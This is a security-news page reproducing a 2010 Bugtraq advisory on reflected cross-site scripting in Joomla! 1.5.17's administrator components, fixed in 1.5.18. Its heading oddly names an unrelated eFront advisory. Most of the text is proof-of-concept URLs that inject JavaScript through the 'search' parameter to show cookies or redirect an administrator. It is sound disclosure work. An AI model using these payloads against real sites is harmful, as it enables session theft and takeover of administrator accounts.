Дополнительная информация

Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

eFront Multiple Parameter Cross Site Scripting Vulnerabilities

From:	Riyaz Walikar <riyazwalikar_(at)_gmail.com>
Date:	3 июня 2010 г.
Subject:	[20100501] - Core - Joomla! Multiple XSS Vulnerabilities in Back End Administrative Module Core Components

Hi Bugtraq,

This is regarding multiple XSS vulnerabilities in multiple core
components of the administrative section of Joomla!

* Project: Joomla!
* SubProject: All
* Severity: High
* Versions: 1.5.17 and all previous 1.5 releases
* Exploit type: XSS Injection
* Reported Date: 2010-May-13
* Fixed Date: 2010-May-28
* Fixed Version: Joomla! 1.5.18
* Update Download Link: http://www.joomla.org/download.html
* Info URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-i
n-back-end.html

Vulnerability Details:

User can execute arbitrary JavaScript code within the vulnerable application.


The vulnerability arises due to the administrator core components
failing to properly sanitize user-supplied input in the "search"
variable. Successful exploitation of this vulnerability could result
in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection,
disclosure or modification of sensitive data and phishing attacks.


An attacker can send a link with the exploit to an administrator whose
access could compromise the application. The following PoC is
available:


http://joomlasite/administrator/index.
php?option=com_users&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E
http://joomlasite/administrator/index.
php?option=com_users&search=%22%20onmousemove=%22javascript:
window.location.assign%28%27http://www.google.com%27%29%22%3E


http://joomlasite/administrator/index.
php?option=com_trash&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_content&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_sections&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_categories&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_frontpage&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_menus&task=view&search=%22%20onmousemove=%22ja
vascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_messages&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_banners&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_banners&c=client&search=%22%20onmousemove=%22j
avascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_categories&section=com_banner&search=%22%20onmouse
move=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_contact&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_categories&section=com_contact_details&search=%22%
20onmousemove=%22javascript:alert%28document.
cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_categories&section=com_newsfeeds&search=%22%20onmo
usemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_poll&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_weblinks&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_categories&section=com_weblinks&search=%22%20onmou
semove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_modules&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.
php?option=com_plugins&search=%22%20onmousemove=%22javascript:
alert%28document.cookie%29;%22%3E

Regards,
Riyaz Ahemed Walikar